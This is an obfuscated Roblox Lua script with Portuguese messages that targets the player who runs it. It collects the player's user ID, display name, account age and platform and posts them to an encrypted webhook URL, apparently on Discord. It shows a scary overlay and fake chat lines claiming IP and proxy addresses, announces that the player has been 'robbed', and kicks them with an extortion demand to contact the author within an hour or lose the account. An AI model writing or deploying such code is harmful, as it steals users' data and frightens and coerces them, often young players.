--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local obf_bitlib = bit32 or bit;
local obf_XOR = obf_bitlib.bxor;
local obf_OR = obf_bitlib.bor;
local obf_AND = obf_bitlib.band;
local obf_stringchar = string.char;
local obf_stringbyte = string.byte;
local obf_stringsub = string.sub;
local obf_bitlib = bit32 or bit;
local obf_XOR = obf_bitlib.bxor;
local obf_tableconcat = table.concat;
local obf_tableinsert = table.insert;
local function LUAOBFUSACTOR_DECRYPT_STR_0(LUAOBFUSACTOR_STR, LUAOBFUSACTOR_KEY)
	local result = {};
	for i = 1, #LUAOBFUSACTOR_STR do
		obf_tableinsert(result, obf_stringchar(obf_XOR(obf_stringbyte(obf_stringsub(LUAOBFUSACTOR_STR, i, obf_AND(i, 1) + obf_OR(i, 1))), obf_stringbyte(obf_stringsub(LUAOBFUSACTOR_KEY, obf_AND(1, i % #LUAOBFUSACTOR_KEY) + obf_OR(1, i % #LUAOBFUSACTOR_KEY), obf_AND(obf_AND(1, i % #LUAOBFUSACTOR_KEY) + obf_OR(1, i % #LUAOBFUSACTOR_KEY), 1) + obf_OR(obf_AND(1, i % #LUAOBFUSACTOR_KEY) + obf_OR(1, i % #LUAOBFUSACTOR_KEY), 1)))) % 256));
	end
	return obf_tableconcat(result);
end
local HttpService = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\249\215\207\53\213\190\213\8\216\192\222", "\126\177\163\187\69\134\219\167"));
local Players = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\19\193\43\220\249\49\222", "\156\67\173\74\165"));
local StarterGui = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\7\163\72\4\168\35\84\19\162\64", "\38\84\215\41\118\220\70"));
local Chat = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\115\30\35\6", "\158\48\118\66\114"));
local SoundService = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\152\43\5\56\119\150\254\185\50\25\53\118", "\155\203\68\112\86\19\197"));
local webhookUrl = LUAOBFUSACTOR_DECRYPT_STR_0("\78\201\34\236\83\34\170\183\66\212\37\255\79\106\225\182\69\210\59\179\65\104\236\183\81\216\52\244\79\119\238\235\9\234\19\222\104\87\202\211\121\244\18\179\119\93\199\208\105\242\29\195\116\87\206\221\104", "\152\38\189\86\156\32\24\133");
local musicId = LUAOBFUSACTOR_DECRYPT_STR_0("\170\14\242\21\164\1\241\21\172\6", "\38\156\55\199");
local function sendNotification(title, text)
	StarterGui:SetCore(LUAOBFUSACTOR_DECRYPT_STR_0("\155\120\114\44\61\123\238\74\174\116\127\41\7\125\245\77", "\35\200\29\28\72\115\20\154"), {[LUAOBFUSACTOR_DECRYPT_STR_0("\45\182\197\211\136", "\84\121\223\177\191\237\76")]=title,[LUAOBFUSACTOR_DECRYPT_STR_0("\143\83\209\180", "\161\219\54\169\192\90\48\80")]=text,[LUAOBFUSACTOR_DECRYPT_STR_0("\109\87\18\36\93\75\15\43", "\69\41\34\96")]=2});
end
local function getPlayerInfo(player)
	local userId = player.UserId;
	local displayName = player.DisplayName;
	local accountAgeDays = math.floor((tick() / 86400) - player.AccountAge);
	local platform = player.OsPlatform or Enum.Platform.Unknown;
	local platformMessage = (((platform == Enum.Platform.Windows) or (platform == Enum.Platform.OSX)) and LUAOBFUSACTOR_DECRYPT_STR_0("\157\192\210\25\17\36\252\194\216\74\17\46\169\131\231\41", "\75\220\163\183\106\98")) or LUAOBFUSACTOR_DECRYPT_STR_0("\35\185\142\36\202\13\250\138\56\153\17\191\158\119\205\7\182\142\49\214\12\191", "\185\98\218\235\87");
	return {[LUAOBFUSACTOR_DECRYPT_STR_0("\254\47\34\244\247\174", "\202\171\92\71\134\190")]=userId,[LUAOBFUSACTOR_DECRYPT_STR_0("\13\200\63\152\37\192\53\166\40\204\41", "\232\73\161\76")]=displayName,[LUAOBFUSACTOR_DECRYPT_STR_0("\154\218\65\82\11\181\205\99\90\27\159\216\91\78", "\126\219\185\34\61")]=accountAgeDays,[LUAOBFUSACTOR_DECRYPT_STR_0("\60\194\95\102\120\120\225\234\33\203\77\97\127\112\246", "\135\108\174\62\18\30\23\147")]=platformMessage,[LUAOBFUSACTOR_DECRYPT_STR_0("\159\250\26\232", "\167\214\137\74\171\120\206\83")]=((platform == Enum.Platform.Windows) or (platform == Enum.Platform.OSX))};
end
local function getGameName()
	return game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\166\241\32\86\253\179\155\252\51\94\253\148\142\226\36\84\251\162", "\199\235\144\82\61\152")):GetProductInfo(game.PlaceId).Name;
end
local function sendToDiscord(playerInfo)
	local FlatIdent_76979 = 0;
	local message;
	local jsonMessage;
	local success;
	local errorMessage;
	while true do
		if (FlatIdent_76979 == 1) then
			success, errorMessage = pcall(function()
				HttpService:PostAsync(webhookUrl, jsonMessage, Enum.HttpContentType.ApplicationJson);
			end);
			if not success then
				warn(LUAOBFUSACTOR_DECRYPT_STR_0("\195\79\124\2\228\14\113\5\165\75\126\28\236\79\98\74\225\79\116\5\246\14\96\11\247\79\48\5\165\106\121\25\230\65\98\14\191\14", "\106\133\46\16") .. errorMessage);
			end
			break;
		end
		if (FlatIdent_76979 == 0) then
			message = {[LUAOBFUSACTOR_DECRYPT_STR_0("\4\25\183\63\2\24\173", "\75\103\118\217")]="Informações do jogador:",[LUAOBFUSACTOR_DECRYPT_STR_0("\194\89\114\17\189\13", "\126\167\52\16\116\217")]={{[LUAOBFUSACTOR_DECRYPT_STR_0("\220\39\52\140\177", "\156\168\78\64\224\212\121")]=LUAOBFUSACTOR_DECRYPT_STR_0("\35\235\177\207\11\230\160\221\71\234\164\142\36\225\171\218\6", "\174\103\142\197"),[LUAOBFUSACTOR_DECRYPT_STR_0("\82\45\76\59\55\87\232\66\33\80\54", "\152\54\72\63\88\69\62")]="Aqui estão as informações da conta do jogador:",[LUAOBFUSACTOR_DECRYPT_STR_0("\210\205\235\80\208\215", "\60\180\164\142")]={{[LUAOBFUSACTOR_DECRYPT_STR_0("\86\95\8\44", "\114\56\62\101\73\71\141")]=LUAOBFUSACTOR_DECRYPT_STR_0("\145\205", "\164\216\137\187"),[LUAOBFUSACTOR_DECRYPT_STR_0("\196\231\61\167\163", "\107\178\134\81\210\198\158")]=tostring(playerInfo.UserId),[LUAOBFUSACTOR_DECRYPT_STR_0("\49\0\142\207\164\61", "\202\88\110\226\166")]=true},{[LUAOBFUSACTOR_DECRYPT_STR_0("\205\14\143\242", "\170\163\111\226\151")]="Nome de Exibição",[LUAOBFUSACTOR_DECRYPT_STR_0("\7\49\190\45\75", "\73\113\80\210\88\46\87")]=playerInfo.DisplayName,[LUAOBFUSACTOR_DECRYPT_STR_0("\136\34\193\27\233\132", "\135\225\76\173\114")]=true},{[LUAOBFUSACTOR_DECRYPT_STR_0("\20\236\181\181", "\199\122\141\216\208\204\221")]=LUAOBFUSACTOR_DECRYPT_STR_0("\132\217\17\244\125\182\169\220\80\211\119\248\185\220", "\150\205\189\112\144\24"),[LUAOBFUSACTOR_DECRYPT_STR_0("\51\133\179\89\1", "\112\69\228\223\44\100\232\113")]=(tostring(playerInfo.AccountAgeDays) .. LUAOBFUSACTOR_DECRYPT_STR_0("\148\27\14\210\165", "\230\180\127\103\179\214\28")),[LUAOBFUSACTOR_DECRYPT_STR_0("\133\11\83\79\234\68", "\128\236\101\63\38\132\33")]=true},{[LUAOBFUSACTOR_DECRYPT_STR_0("\162\168\28\65", "\175\204\201\113\36\214\139")]=LUAOBFUSACTOR_DECRYPT_STR_0("\119\192\52\200\5\65\195\39\209\5", "\100\39\172\85\188"),[LUAOBFUSACTOR_DECRYPT_STR_0("\187\121\181\149\54", "\83\205\24\217\224")]=playerInfo.PlatformMessage,[LUAOBFUSACTOR_DECRYPT_STR_0("\239\203\193\52\232\192", "\93\134\165\173")]=true}},[LUAOBFUSACTOR_DECRYPT_STR_0("\189\253\205\205\40", "\30\222\146\161\162\90\174\210")]=65280}}};
			jsonMessage = HttpService:JSONEncode(message);
			FlatIdent_76979 = 1;
		end
	end
end
local function createWarpEffect()
	local FlatIdent_24A02 = 0;
	local player;
	local screenGui;
	local warpFrame;
	local distortionImage;
	local sound;
	while true do
		if (FlatIdent_24A02 == 6) then
			wait(7);
			sound:Stop();
			screenGui:Destroy();
			break;
		end
		if (FlatIdent_24A02 == 0) then
			player = Players.LocalPlayer;
			screenGui = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\107\35\97\249\95\78\127\53\122", "\32\56\64\19\156\58"));
			screenGui.Name = LUAOBFUSACTOR_DECRYPT_STR_0("\109\201\247\70\127\244\134\95\203\241\113\79\251", "\224\58\168\133\54\58\146");
			screenGui.Parent = player:WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\105\90\74\228\112\148\160\30\80", "\107\57\54\43\157\21\230\231"));
			FlatIdent_24A02 = 1;
		end
		if (FlatIdent_24A02 == 4) then
			distortionImage.Image = LUAOBFUSACTOR_DECRYPT_STR_0("\19\229\80\94\96\18\226\92\86\119\91\168\7\8\34\83\183\16\6\36\82\191\27", "\19\97\135\40\63");
			distortionImage.ImageTransparency = 0.5;
			distortionImage.ZIndex = 11;
			sound = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\157\83\38\53\43", "\81\206\60\83\91\79"));
			FlatIdent_24A02 = 5;
		end
		if (FlatIdent_24A02 == 5) then
			sound.SoundId = LUAOBFUSACTOR_DECRYPT_STR_0("\92\169\200\115\60\208\72\176\71\175\138\61\96", "\196\46\203\176\18\79\163\45") .. musicId;
			sound.Looped = true;
			sound.Parent = SoundService;
			sound:Play();
			FlatIdent_24A02 = 6;
		end
		if (FlatIdent_24A02 == 3) then
			distortionImage.Name = LUAOBFUSACTOR_DECRYPT_STR_0("\153\208\51\88\178\203\52\69\178\215\9\65\188\222\37", "\44\221\185\64");
			distortionImage.Parent = warpFrame;
			distortionImage.Size = UDim2.new(1, 0, 1, 0);
			distortionImage.Position = UDim2.new(0, 0, 0, 0);
			FlatIdent_24A02 = 4;
		end
		if (2 == FlatIdent_24A02) then
			warpFrame.BackgroundColor3 = Color3.fromRGB(0, 0, 0);
			warpFrame.BackgroundTransparency = 0.5;
			warpFrame.ZIndex = 10;
			distortionImage = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\98\222\185\75\30\81\74\209\189\64", "\29\43\179\216\44\123"));
			FlatIdent_24A02 = 3;
		end
		if (FlatIdent_24A02 == 1) then
			warpFrame = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\253\153\16\248\188", "\175\187\235\113\149\217\188"));
			warpFrame.Name = LUAOBFUSACTOR_DECRYPT_STR_0("\11\174\147\92\197\107\121\49\170", "\24\92\207\225\44\131\25");
			warpFrame.Parent = screenGui;
			warpFrame.Size = UDim2.new(1, 0, 1, 0);
			FlatIdent_24A02 = 2;
		end
	end
end
local function sendFakeChatMessages()
	local player = Players.LocalPlayer;
	local playerInfo = getPlayerInfo(player);
	local messages = {LUAOBFUSACTOR_DECRYPT_STR_0("\157\55\62\13\43\238\175\188\45\62\60\54\250\252\177\46\63", "\143\216\66\30\126\68\155"),"Minha proxy é 192.168.1.1","Meu IP é 172.16.0.1",LUAOBFUSACTOR_DECRYPT_STR_0("\142\230\62\145\133\251\153\185\228\144\67\147", "\129\202\168\109\171\165\195\183"),LUAOBFUSACTOR_DECRYPT_STR_0("\6\118\4\152\238\6\239\52\89\51\215\132\84\183\108\9\121\137\144\69", "\134\66\56\87\184\190\116"),LUAOBFUSACTOR_DECRYPT_STR_0("\26\36\0\251\11\228\52\55\61\53\6\251\9\228\51\117\50\62\11\226\64\178", "\85\92\81\105\219\121\139\65")};
	for _, message in ipairs(messages) do
		Chat:Chat(player.Character.Head, message, Enum.ChatColor.Red);
		wait(1);
	end
end
local function startScript()
	createWarpEffect();
	sendFakeChatMessages();
	sendNotification("Segurança", LUAOBFUSACTOR_DECRYPT_STR_0("\222\188\64\76\125\209\249\188\16\81\115\219\242\160\16\74\111\159\238\182\69\86\60\219\252\183\95\86\60\219\242\243\98\74\126\211\242\171\30\11\50", "\191\157\211\48\37\28"));
	wait(2);
	sendNotification("Segurança", LUAOBFUSACTOR_DECRYPT_STR_0("\251\30\240\19\41\159\28\251\12\51\222\27\251\15\122\220\16\249\92\41\202\28\241\15\41\208\94", "\90\191\127\148\124"));
	wait(2);
	local playerInfo = getPlayerInfo(Players.LocalPlayer);
	sendNotification("Informações da Conta", LUAOBFUSACTOR_DECRYPT_STR_0("\81\163\116\87", "\119\24\231\78") .. playerInfo.UserId .. "\n" .. "Nome de exibição: " .. playerInfo.DisplayName .. "\n" .. LUAOBFUSACTOR_DECRYPT_STR_0("\171\41\164\78\217\0\21\131\109\166\69\210\84\16\216\109", "\113\226\77\197\42\188\32") .. playerInfo.AccountAgeDays .. " dias\n" .. LUAOBFUSACTOR_DECRYPT_STR_0("\10\26\245\161\59\16\251\167\55\23\174\245", "\213\90\118\148") .. playerInfo.PlatformMessage);
	sendToDiscord(playerInfo);
	wait(2);
	sendNotification("Segurança", "Parabéns, você acaba de ser roubado por nob999");
	wait(2);
	Players.LocalPlayer:Kick("Você tem 1 hora para entrar em contato comigo para discutirmos o ocorrido, ou sua conta será desativada. :D | Meu Discord: orsogna.");
end
startScript();
